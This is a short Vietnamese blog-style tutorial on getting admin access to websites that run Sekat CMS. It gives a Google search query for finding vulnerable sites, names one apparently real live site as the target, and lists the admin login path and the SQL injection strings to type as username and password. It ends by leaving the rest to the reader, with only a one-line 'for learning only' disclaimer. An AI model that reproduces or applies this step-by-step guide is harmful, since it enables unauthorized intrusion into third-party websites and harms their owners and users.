Sekat CMS hiện đang bị lỗ hổng SQL Injection, chỉ với một vài thủ thuật nhỏ, bạn có thể truy cập vào quyền quản trị Admin của Website, mà không cần phải tốn nhiều thời gian để khai thác.
Mình đi thẳng vào vấn đề luôn nhé
Bước 1: Tìm các Website sử dụng Sket CMS bằng Google
Nhập lệnh tìm kiếm dưới đây vào Google Search
intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com
Bước 2: Chọn bất kỳ 1 Website được liệt kê trong Google
Mình sẽ chọn trang: http://unstccs.com để Test
Bước 3: Truy cập vào Weblogin Admin bằng Link dưới
http://tênwebiste.com/member_login.php
Cụ thể sẽ là:
Bước 4: Khai thác lỗi đăng nhập bằng điền User và Pass như bên dưới:
Username: '=' 'or' Password: '=' 'or'
Bước 5: Truy cập được vào quyền Admin, việc tiếp theo là của các bạn
Chỉ nên dùng để học tập, đừng phá người khác nhé
